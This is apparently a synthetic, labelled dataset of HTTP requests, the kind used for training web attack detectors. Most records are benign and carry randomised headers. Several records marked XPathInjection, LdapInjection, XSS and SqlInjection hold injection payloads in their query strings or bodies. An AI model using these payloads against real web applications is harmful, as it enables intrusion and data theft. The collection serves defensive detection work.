Proxy-Authorization: NTLM aGR0ZWdvYXV0ZXNpNE1wZWVjbW5kaGVqVHVUYUxlbzA=
Authorization: NTLM dW43ZTNOOXRlZXhzaWZpZXhzbGF1dDl0b0ZBb0dodG45ZnlhYWNlbWxpaUM1
Range: 784942-,615-
Referer: /imrtlr/snbrUkr.jsp
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 9.9; cm-dP; rv:0.9.0) Gecko/78697300
UA-CPU: Sparc
UA-Disp: 091,777,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5013x5767
Via: FTP/8.8 134.136.233.2
Transfer-Encoding: deflate
Upgrade: eef2i/3.2, ser/9.6, hry/1.6, 2dctn0/3.8
Warning: 212 92.42.159.177:5 "tacideteon" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 7508201
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14088
Start - Id: 18680
class: Valid
GET /ts4e9setttsiiaracc.aspx?ssecfmatROr=nAsyhnommts%3B&Ohavingxmlq=rKp%40VTJZ&etclchrq=epohcshras%2F&3uehLpa=9418 HTTP/1.1
Host: 105.140.174.228
Connection: close
Accept: text/*;q=0.0, text/html;q=0.7
Accept-Charset: us-ascii;q=0.1
Accept-Encoding: compress;q=0.8, deflate;q=0.8, deflate;q=0.5
Accept-Language: hnlncntj-rfae;q=0.2, ss-2dywed;q=0.5, bey-AgEpitk, ol-nt;q=0.0, in6uOd-Noee;q=0.1
Cache-Control: no-store
Client-ip: 235.32.209.124
Cookie: bf54Rn=mF7V;7Efre9ih1anhi=ct$;stteniisgxen1=aA(DegnEns
Cookie2: $Version="9"
Date: Sun, 11 Jul 04 22:05:11 CET
ETag: "18_WkBmkSShIn4-Tm"
Expect: 100-continue
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Fri, 21 Oct 05 05:00:32 UTC
If-Match: *
If-None-Match: "oElyQRGRVgtNpYiNb"
If-Range: *
Max-Forwards: 186
MIME-Version: 5.8
Pragma: n='t8'
Proxy-Authorization: Basic ZVdzYTozc2V3YzF2
Authorization: rele sN1d=tajoal
Range: -26
Referer: /uAos/hno3/ic1lnL/Somo/uefsOaqd.png
TE: deflate,gzip;q=0.1
Trailer: If-Match
User-Agent: Mozilla/1.7 (Machintosh; U; Mac OS X 2.2; nb-io; rv:5.2.8) Gecko/88768698
UA-CPU: MIPS
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8595x9488
Via: FTP/1.7 www.oeqE.tiff:25
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 04013
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18680
Start - Id: 14909
class: Valid
GET /V1b7scriptHMWa/mttrctAndesaeherac/Hm3ftagooeesWaaMi/rA3rIJrhm/KbwP3X.cgi?emumet=leMlwnesiutm&1j4S2=295263&reSI=iai1&nijO=trDqXjR&qtmaoy=djItT&ecax3aoi=wheren&ucg=n5ynti%5CHin%2Be3+hlo&or2LkY9=s&AxCpX4=39&enteMoaacoer=nst8thtvqo%28nA&emia=83766&arUqm1f=dHgmAeirsrwsetee&kdairiuuexr70n=eFc1+&JX@styleweval-36t=9285056&ktuoI=inJJoH%401 HTTP/1.0
Host: www.aspdNaEk.com:0968
Connection: keep-alive
Accept: text/xml;q=0.4
Accept-Charset: isiri-3342, x-mac-chinesetrad;q=0.1
Accept-Encoding: gzip, identity;q=0.3, identity, gzip;q=0.6, deflate
Accept-Language: m-tittrhln
Cache-Control: dp9gh='kemoGt'
Client-ip: 80.243.239.27
Cookie: deeAietl=ieteN;myet=raT;Omrtadleapelg=ws9T;seaiy=al;nn=)s(E
Cookie2: $Version="878"
Date: Wed, 15 Feb 06 19:54:55 GMT
ETag: "RFGfswz-cZFmM3r"
Expect: irjtg=mioo
From: rci1ha@regno3ir.ch
If-Modified-Since: Sat, 27 Aug 05 21:51:17 GMT
If-Unmodified-Since: Thu, 11 Jan 07 09:16:54 UTC
If-Match: "-vsNtRsPJdjvGtwJl.La"
If-None-Match: *
If-Range: Sat, 20 Jun 09 08:01:03 GMT
Max-Forwards: 69
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzYWc6NnhzNnlsb3M=
Authorization: 8arok qv5onc=oOsc
Range: -14906,6-959
Referer: /rdsr/3nrte7o/nlbtudo/azrs.jpg
TE: chunked
Trailer: From
User-Agent: saunySwir (nhEeIurRK; eSys-E; lB5EJVPu9; e2Tnor)
UA-CPU: StrongARM
UA-Disp: 8593,9918,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 0.8 225.65.218.13, FTP/8.9 www.iystef.jpeg
Transfer-Encoding: gzip
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 526 206.248.199.251:46267 "syus5sspftan" "Sun, 05 Sep 04 12:39:37 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 580548431954980
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14909
Start - Id: 48596
class: XPathInjection
POST /tttsisTeswa.cfm? HTTP/1.1
Content-Length: 384
Content-Language: eoi5,xtr
Content-Encoding: gzip
Content-Location: /dnFirDnt/teempua/teuorvst/Aa7dlk9e/e6n2.zip
Content-MD5: bWttU2Vyb2d1bmllZzhlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Mar 05 10:17:40 GMT
Last-Modified: Mon, 12 Jun 06 17:44:59 GMT
Host: 135.243.127.24
Connection: close
Accept: */*;q=0.2
Accept-Charset: koi8;q=0.4, isiri-3342
Accept-Encoding: identity, identity;q=0.7, compress;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 58.151.109.14
Cookie: noixRe4yyrs=00266712;tha9Utfed2m=3867;P0nwinntgQHUtDAv=atcyTioeahn 3d;ieo;Bnf9ehw=150;orav=samwb:mouus;acona=w
Cookie2: $Version="357"
Date: Sat, 10 Jun 06 23:54:46 UTC
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Thu, 19 Oct 06 21:37:03 CET
If-Unmodified-Since: Tue, 23 Jan 07 07:16:41 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Wed, 10 Dec 08 08:26:17 UTC
Max-Forwards: 41
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic eG9IaTZ0ZGc6ZWZOcmg=
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: http://viusthfa.it/dxsef/oXtnno/veyn/ti6u/xltia.gif
TE: deflate;q=0.7,gzip
Trailer: Authorization
User-Agent: Mozilla/7.2 (Windows; U; Win98 2.4; oo-et; rv:7.7.2) Gecko/04056573
UA-CPU: PowerPC
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: 7.5 www.rQnn.tiff, artjhe/1.2 www.hbAwet.gif, FTP/0.8 220.203.239.194
Transfer-Encoding: deflate
Upgrade: iroi/0.7, Osior/8.4, 9Ceim/4.8
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 9225103
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ii=hbimge8swp-rc4&cyhh6uaHgtu=jexec~iUkflog n1oti;cat39n&bsoh0oenaYb=77416881&reTSlsci2n9a=53654&pk=tnnoLos47lo&yItexweerd59Ar7=13602210&reno9Pam8t9Nbsa=2882962958&G@optp=4825296&yuesturntco=363  or   1< Ssosrh/dh/81/child::text()[position()=58]    or    31465='] | /* | /foo[bar='&ooi1D=s5som&eedt7oaieaAe=bnpM0n6rioe n&fT.yTc9=Karh4

End - Id: 48596
Start - Id: 32281
class: Valid
GET /eoFioamNeszyaoua/Jp9T7WM/aq8opnlweEse3Sn2/dzh2.irQGI/oSbv.MBdIpasY2fC4/QlNU8LperlhMf/jjwUVA0APYhlXsk/wzoeastuifepnaeh/iaowqmmptlhGso2pwi9/au8dbKj.tiff?Cd0DA.b0--@=+eahfAea&aorj=Ar%3A3i&nlnelyse=rtlF&aNtaeg=oHcO&nsmO=lmetao%270ao&nutoHsyoribad=eeos%408Qa HTTP/1.0
Host: 44.141.162.180
Connection: oha3n
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 249.67.177.219
Cookie: wernTHtb4ie=acceptalogmE1Tn/h
Cookie2: $Version="0"
Date: Fri, 26 Aug 05 22:05:02 GMT
ETag: "YpezWtO6XwV55xEjUL"
Expect: tnetdm=sodtro;3bhacefs
From: mnonn5h@wlv1.be
If-Modified-Since: Sun, 04 Oct 09 12:41:00 CET
If-Unmodified-Since: Sun, 17 Dec 06 17:45:07 CET
If-Match: "Va0vlxpC@P4-z2Kzt"
If-None-Match: "3QEOjtYsvBw5lsk"
If-Range: Fri, 15 May 09 24:47:07 CET
Max-Forwards: 792
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: 79hn saDoEtg=ceejy
Range: -265,3-,-2
Referer: /x2ttaooa/eetA/saodn/i8dft6h.asp
TE: trailers,trailers,deflate;q=0.5
Trailer: Date
User-Agent: 3Qilt (dZjqtUaeao; c1Qrv6gNK; u5S3zNk)
UA-CPU: x86
UA-Disp: 090,0267,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3225x292
Via: 2.6 www.sriF.gif, HTTP/4.8 www.a5ahbh.tiff:247
Transfer-Encoding: gzip
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 0209059866117635
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32281
Start - Id: 10168
class: Valid
GET /eYnPnksChVF6q7/opVcEM/f@6MLhh-hjL/fhoc43ta4htz9ois1n/FznmTedOaceeoa4wds/rh8azzTcE3H_/2O_CY0amnEe3AcZm86S/eed6bueeojbNO0hsole/rsvxioraiEcmVels1hN5/l4UYRC2.SU.tiff?rlmoEe1s=tSin&iZqM=rU0KBkKN&14hrpeSvbij=raSaheteFibhri&alzoso4dnmh=wocnepZluwtsr%3BS&foTni=oeeeEeo&5kDz1et=iG.Q3&emrnglc3=xlF6_ofRFKB&L1.x27G9Uf=lePR HTTP/1.1
Host: 254.69.147.223
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 206.184.127.225
Cookie: ebx8rrIis=hdeikii4nwmtuiapst
Cookie2: $Version="914"
Date: Tue, 14 Sep 04 24:40:24 CET
ETag: W/"3t_JoJnyS4lk6cjv"
Expect: hjsoRil=tMarhto1;7uvr=rhOcENs
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sat, 12 Sep 09 18:34:01 GMT
If-Unmodified-Since: Sat, 30 Jul 05 04:02:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 96
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: eiyt ntinogsn=uydts
Authorization: NTLM ZWR1dG5pdHRUc29kYmVzZWJ1Z3lha3FzYXFub2dBYXVlN2l3dg==
Range: 35-
Referer: http://www.hswPdbko.net/silnpOf/20beeea/tp5j/stwnE7.swf
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: User-Agent
User-Agent: atfobrr/6.9.3.7
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: HTTP/7.7 www.2e8I03.html
Transfer-Encoding: 4rrmah
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 109 252.20.208.165 "rNuyl" "Mon, 17 Jul 06 17:30:19 GMT"
X-Forwarded-For: 104.138.147.78
X-Serial-Number: 87261
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10168
Start - Id: 14666
class: Valid
GET /AT%uf/eVrSMlgw6ghdpZaX/nhapeuht8srgt/oaa5eiHH2tiTpi85obp/includeBIqyr_having/esn9uhNshr/JJHW/L7ortmpKPBM/Tnt2fake/oriuffnl49Zqs.sh?id0VjhAOsusrXb=57745 HTTP/1.1
Host: 114.225.40.114
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate, deflate, identity;q=0.2, compress;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 244.110.194.11
Cookie: zNnJuAdC=lallAsttaFspztm;iu9mnqaprxdUh=61;nelmeakPivRfh=tfoeBitsiuessh5a;nsditueeularm=Roe0;ECbHucvwV=108448
Cookie2: $Version="1"
Date: Mon, 24 May 04 19:00:20 GMT
ETag: W/"PITj1mQvtEC@Wib"
Expect: ssaxPoA4
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Thu, 11 Mar 04 11:40:17 GMT
If-Unmodified-Since: Tue, 20 Jul 04 05:53:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Lclthi ahcl8ti=1sdr
Authorization: tEu4 M2Ylji1n=atar
Range: -471335
Referer: /xy0gs/es5N/udimT/nmstOi/ovar.cgi
TE: gzip;q=0.0
Trailer: Pragma
User-Agent: phhoccepmn (twDbez; tsp0YgW7X; lukELTHY)
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4042x463
Via: HTTP/9.9 15.47.228.226
Transfer-Encoding: deflate
Upgrade: iinxrh/1.1, rd9/9.8, kohAe/3.0, cvw/1.2
Warning: 597 67.184.199.201:130 "0or2nhuteaidi1Ak2" 
X-Forwarded-For: 69.48.79.193
X-Serial-Number: 0255447717668411
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14666
Start - Id: 9064
class: Valid
GET /rcyrvR/aeeaq/BV7-yqEgbu_Y/M@ftpD6kN4YmochasV/uete3o/tkS_4Lei1dqCg7/3muC0C7x.C/utVBwhM0Rz4phhFA/e7iaicpaus.mdb? HTTP/1.0
Host: www.t3e9.gov
Connection: eh3ega
Accept: application/postscript;q=0.3, audio/*;q=0.0, audio/*;q=0.8
Accept-Charset: cp-936
Accept-Encoding: deflate, compress;q=0.1
Accept-Language: xeRsootl-eetiiLei;q=0.5
Cache-Control: f=d
Client-ip: 120.111.18.200
Cookie: PMt9vdsnmnR=lsWe>nretn;efirhwiJi=30500;orgoh=8267301199;Noto5e0M=Mcp
Cookie2: $Version="18"
Date: Wed, 04 Nov 09 20:08:24 GMT
ETag: "sS.c56WXGb47EKtK8"
Expect: 100-continue
From: ueP9ir@rAnlhe.it
If-Modified-Since: Fri, 12 Dec 08 03:55:05 GMT
If-Unmodified-Since: Fri, 30 Jun 06 14:27:55 GMT
If-Match: *
If-None-Match: "OpVpvHhG@5xTId9Qi8j"
If-Range: Wed, 09 Nov 05 24:19:02 CET
Max-Forwards: 69
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: rneu expZ=5wizus
Authorization: Basic MmVlOTpvaVZiaGEwZQ==
Range: -9,-8753
Referer: http://www.daiatwth.gov/80aejs7g/2heioitf/reSsa.doc
TE: trailers,chunked,deflate
Trailer: Connection
User-Agent: s48GzT0 http://www.ipei.st
UA-CPU: 68000
UA-Disp: 6130,9479,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1506x4944
Via: FTP/3.2 86.11.131.85:68765, 3.7 www.soeLa.jpg:732, 9.1 196.197.50.143:65
Transfer-Encoding: whtd8; n02ugns=UitlmXi
Upgrade: Ektmi/4.4, l0dr/4.3, sifbE/1.7, ejpbmd/3.6
Warning: 025 www.lpv9b.shtml "tFr7n0ijdontAxhnO" 
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9064
Start - Id: 2892
class: Valid
GET /mIct/dpVH_gXPIqDRa@fj/toxmxbr88cYV7v/x3/nnEp/herirjm/lfV5N0Omfhg/t0IPreQ5LlZi4o3hVlNN/aLpttkak-pP4/ejactinAihmoA3steihb.cfm?tievitUr3E=letVin2&a6dnle=si3Mw&rkrstpGw=563&rSio0b3=9211884&uilierea2h2l=ie8EE1%40zbMt.&o0yot=EuTlike&tsppnX9tqio=11186&e8dlTnhauEi=81%5C HTTP/1.1
Host: www.nureyycoT.com:3
Connection: close
Accept: text/html, video/*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 12.8.60.251
Cookie: le=@ama90gloygs;cn6deleteifBII=t6BYjldS1M;oelrilonenIal=Yesier;D1eo=35240868;l6t51pxreaaaLst=03995046;moSonTi=tOosahtDmoteifdc
Cookie2: $Version="9"
Date: Sun, 14 Oct 07 24:31:58 CET
ETag: "HGCRwrrbAwb_eETJd"
Expect: 100-continue
From: thiar@hoemEai.ch
If-Modified-Since: Thu, 06 Nov 08 03:13:13 UTC
If-Unmodified-Since: Wed, 20 May 09 06:49:02 GMT
If-Match: *
If-None-Match: "jRVogvWcIe2@TDx1"
If-Range: Fri, 11 Jan 08 03:50:29 UTC
Max-Forwards: 431
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: aHELco LimsO0e=ho98
Authorization: orotim hDDeio=wolhrOtt
Range: 11041-66738
Referer: http://9iear.com/Aefss.jpg
TE: chunked;q=0.2
Trailer: Expect
User-Agent: Mozilla/1.2 (X11; U; Linux i386 6.3; 7d-ri; rv:1.7.9) Gecko/26211977
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 640x6169
Via: 1.2 www.mehwdr.css, 6.5 www.ie3soe.jpeg, FTP/9.6 www.mtneit.gif
Transfer-Encoding: compress
Upgrade: 7I07i/0.7, ri7He/2.5
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2892
Start - Id: 38109
class: LdapInjection
GET /xqe/toVZNo2LKhAkEwvfMHzR/rsrrinhhhn0nR7a/tXfHVtUO3-i_N9a/r-.xQFdlqpD/hiaberrt3bYlt/ffUFnPGH/eRHYiQ1.BeAm/enRe/zCFeKX6gRNlqI/dt.jsp?b2L9smttdyre=005715&ybeReO=4&b2Ace3nshot=26&oaii=nht&tTpqlaeco3rne=a5O7&45MGawindow.open.position=74266328&nnwcA=Mexsd&ovsaElnu5O9josl=peRiehrh4orit6elsf&radrakhNoe9=R7dua&sfcttsqmn5nNsia=raiz&tilo=%3Dl4&28lxhersero=1173506&cEDirnemKHrX=r&nh4NeCmiecca=%29+%28+%7C+%28of%3Dtm*%29 HTTP/1.0
Host: 131.209.244.221
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.7, iso-8859-4;q=0.2, iso-8859-6, iso-10646-ucs-2;q=0.0, iso-2022-jp
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 223.239.75.68
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="3"
Date: Wed, 13 Aug 08 04:16:54 UTC
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: 100-continue
From: gnhjruh@dteigtlw.biz
If-Modified-Since: Tue, 05 Jun 07 10:38:32 UTC
If-Unmodified-Since: Mon, 08 Oct 07 01:50:31 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Jun 05 12:46:55 UTC
Max-Forwards: 1
MIME-Version: 2.3
Pragma: 7dasnanj='odiat'
Proxy-Authorization: Digest response="92e80D5cAB98CEDee5dA1856cb2AC04C"
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: http://rdfeR5g.cz/tnhtf7/aahtescs/uixs/WhaXo/hTExos.mpg
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: Mozilla/9.6 (X11; U; Open BSD i586 0.2; d4-9U; rv:3.8.2) Gecko/97807606
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: pde9/1.0 www.eimrtvg.css
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 773 www.pns3h.shtml:30 "Bia6nnelerntsir" "Mon, 07 Aug 06 12:34:20 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38109
Start - Id: 30156
class: Valid
GET /yTwpethooe/tTSoI0yAUz/8v/4GWQcUtREqM-l4F/rF5Q/imga.t4hRGN/o2LKNMwOSAjuLl_Y/exy9usshqcdSV/pUfa.QTSZYPz0xFZ7g/kk/aOGRxJX.php?nmeuheealnl=ittsdL&nnod3w=9848874377&-Ly.H=ee1N&OAdtmpRjDuT9L=566181&spo1ha=eENFIJMK_o&faCiWfSCsciOir=2046&ietcee8=uC5&loqss=80&lhzznn=zvTdiPUP&isr3r=s-ttqu5k.&sne=t%3Eeoony&8dropfnav=object&0tet2iOoel=ggI6-&IWtitiisore4=9do+%286heRrrcpipassthruadmin%5Bar HTTP/1.0
Host: 201.201.50.197
Connection: tiseeEtn
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: r8us-aqe;q=0.1, xbsl-6areanc, a-ltmeeiu;q=0.1, ay2stvn-tckjar9t, etnzmslr-T4isaw
Cache-Control: no-store
Client-ip: 146.181.60.5
Cookie: yE=Our qrrai/l1ph;od8atzlntot=849129
Cookie2: $Version="0"
Date: Sat, 14 May 05 17:20:39 GMT
ETag: "WJVmn.kXGFfEs69g0"
Expect: eldO
From: heOsedeo@tympyx.fr
If-Modified-Since: Thu, 26 Mar 09 20:32:28 GMT
If-Unmodified-Since: Wed, 12 May 04 10:30:05 UTC
If-Match: *
If-None-Match: *
If-Range: "3OoicjSUt7sXG6KGEd"
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM aG56NGV3c05md2l0M2VlbjdhdXNzZTIwZnVsbGVlcG9lNW9TaWVkaXRnbGRyZw==
Authorization: pnayes 5eoh6=hotirn
Range: -1
Referer: http://Hxaw.net/mErla6nu/titr.gif
TE: gzip,gzip
Trailer: Upgrade
User-Agent: Mozilla/3.3 (compatible; nSayoohaye; Linux i586; eul5ota)
UA-CPU: Sparc
UA-Disp: 9773,678,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 488x0113
Via: 2.0 www.tteait.tiff:44678
Transfer-Encoding: compress
Upgrade: eneor/3.9, enodo/5.9
Warning: 169 145.87.255.238 "bhcawmncs4" "Fri, 12 Jan 07 03:02:59 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 7148566878920478755
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30156
Start - Id: 47361
class: XSS
GET /G_hq4/rD5eU35jN4HqgSV/aA/sCEdlslEelAeEembe7/otsefefib2.msf?NbatnEeunispp=%3Ea&16rutsr=3494472664&hs=%3Cimg%2Bsrc%3Djavascript%3A++alert+%28%27uttuhk.en%27%29++++%3E&nR8B=iB4VjlVD&fI=a-69Hkp3GZkM&Eaagslmrt=le7&lUrstah6=i8ypjLkm8C&spwgoiof=ohttpensc&rnir=736811476&tgddwhxm1hwut=1712&XONIFT4tx=eetsdooldsenr&rksaudg9ate0n=ewRj867Q&7Gs=o40r%40lLnull%3Enachildpi&2oothr8=eoMxzaGIwQ&m1agPs=e+s%2Bin HTTP/1.0
Host: www.kIeeamte.ch
Connection: close
Accept: text/*, application/zip;q=0.0, image/jpeg;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: cnNOe5-Fskthip, r7A-l;q=0.4
Cache-Control: only-if-cached
Client-ip: 30.118.108.110
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="10"
Date: Mon, 01 May 06 15:35:00 GMT
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: rnyes=dheroAo;tunizx
From: 1vfrn@reeDe.org
If-Modified-Since: Thu, 08 Oct 09 19:54:55 CET
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Apr 10 21:15:23 GMT
Max-Forwards: 78
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZW5sZ3NydDNhZWtuOWxtZmFhUm5pVHJvZXNlZW9hc2FsZGlkbmRuZWh6bmU=
Authorization: NTLM QWdhbnNpb2xEdGVleGFibDVvcHRUY296ZW90OWw5cmZ1ZTJzOG1PQnNyc20=
Range: -066761,152-
Referer: /NTwp0lM/67Chn.nsf
TE: gzip
Trailer: Trailer
User-Agent: Le9mkoa
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 605x5902
Via: 7.4 81.79.35.1:95
Transfer-Encoding: compress
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47361
Start - Id: 41689
class: SqlInjection
GET /CdNas2sesyutIooecB5/1pTcwZNqbHdYwmvVM6iZ/o3c/vPUVM/hIxp_e/rmCLThtacceshbw.php?neWe=40457&igiiisrgIsiheof=85164&aH=09617&gh=bwr6kapg&mspyo2=2201&yf2bd=%27+OR++%27ahrp%27+++++%3D++N%27++&eno3clsnhe=61651756&oq9Xec6diExd=pxNy4jZS4&iEaItiToranouu=pvp3PPOS HTTP/1.1
Host: 149.125.206.240
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, gzip;q=0.2, identity, deflate;q=0.4, gzip;q=0.9
Accept-Language: ev2ltt-7m1ta;q=0.2, qbnmO-nemtEs;q=0.0, M-r
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: th=@cscriptm;execVbetweenIconnectSx95=lirdon8ssvhcopenW
Cookie2: $Version="1"
Date: Sat, 03 May 08 12:14:01 GMT
ETag: "rLGxCggwtE@E2OyW"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 24 Aug 08 20:53:29 GMT
If-Unmodified-Since: Fri, 06 Nov 09 10:17:29 CET
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: "1TjoPZvynQQX@yLAV"
Max-Forwards: 4
MIME-Version: 7.5
Pragma: pmhldf=lo
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Aato8 oEoat=n1i8daro
Range: 271923-
Referer: /Ea4ejtnb.mpg
TE: deflate;q=0.2,chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.1 (compatible; Konqueror/6.6; Open BSD i586; e1raoc2l4; nVciefe; omee1dtpa)
UA-CPU: PowerPC
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0003x3071
Via: 5.2 www.uhzeto.tiff, HTTP/0.7 www.dhAob7b.htm
Transfer-Encoding: ciwyit
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 39.208.247.75
X-Serial-Number: 611965021882313
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41689
Start - Id: 20374
class: Valid
GET /eciOht/ia4OaiieTlueswTt/hlEoye/ohN7fm73c.gqi/6MrF/u9LY7HFj.shtml? HTTP/1.0
Host: www.ntetsb7.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 46.2.161.12
Cookie: sSe4Ddtr=EaV;edtmfnl0r4taen=2wacA;41yrtwibiitges=74;eis=7204908
Cookie2: $Version="095"
Date: Tue, 17 Jan 06 17:08:20 CET
ETag: W/"i3XF4AurOvvKSD_i8.hE"
